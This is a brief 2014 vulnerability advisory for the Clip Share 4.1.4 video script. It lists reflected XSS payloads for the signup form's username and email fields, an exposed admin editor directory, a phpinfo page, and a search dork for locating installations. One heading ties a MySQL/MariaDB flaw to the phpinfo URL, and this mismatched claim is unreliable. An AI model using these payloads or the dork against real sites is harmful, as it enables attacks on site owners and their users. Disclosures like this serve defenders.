facebook facebook twitter rss

Clip Share 4.1.4 Multi Vulnerability

Author: indoushka , Published: 25-10-2014
Clip Share 4.1.4 Multi Vulnerability
====================================
Author : indoushka
Vondor : http://www.clip-share.com/
Dork : Powered By ClipShare
======================================

Xss :

This vulnerability affects /ClipShare/signup.
URL encoded POST input username was set to xtqewoxj" onmouseover=prompt(993897) bad="
The input is reflected inside a tag parameter between double quotes.
URL encoded POST input email was set to sample%40email.tst" onmouseover=prompt(901680) bad="
The input is reflected inside a tag parameter between double quotes.

Directory listing :

http://127.0.0.1/ClipShare//siteadmin/editor_files/

Security vulnerability in MySQL/MariaDB sql/password.c :

http://127.0.0.1/ClipShare/phpinfo.php

Like us on Facebook :